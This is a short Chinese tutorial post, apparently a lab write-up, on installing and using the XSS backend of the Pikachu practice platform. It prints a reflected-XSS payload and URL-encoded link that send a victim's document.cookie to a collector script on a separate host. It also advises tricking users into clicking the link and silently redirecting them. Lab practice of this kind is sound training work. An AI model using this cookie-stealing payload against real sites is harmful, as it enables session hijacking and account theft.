码迷,mamicode.com
首页 > 其他好文 > 详细

pikachu XSS后台的使用和安装

时间:2020-02-12 19:02:30      阅读:356      评论:0      收藏:0      [点我收藏+]

标签:ref   submit   就会   location   reflect   png   pika   alt   font   

xss后台的安装

技术图片 

技术图片

重定向到另一个可信网址  让点击者 不知情

 

 技术图片

 

 

 1.cookie值获取

查看源代码

技术图片

 在反射型xss(get)页面下使用

 

<script> document.location = ‘http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=‘   +  document.cookie; </script>

 技术图片

 

 

 点提交,会跳转到首页,

 

 技术图片

 

 http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E+document.location+%3D+%27http%3A%2F%2F192.168.50.100%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+++%2B++document.cookie%3B+%3C%2Fscript%3E&submit=submit

欺骗用户去点击

就会出现第二个

技术图片

 

 

 反射型xss(get

让用户去点击这个页面  获取cookie值

 技术图片

2.钓鱼结果

 

3.键盘记录

 

 



pikachu XSS后台的使用和安装

标签:ref   submit   就会   location   reflect   png   pika   alt   font   

原文地址:https://www.cnblogs.com/xingyuner/p/12299840.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!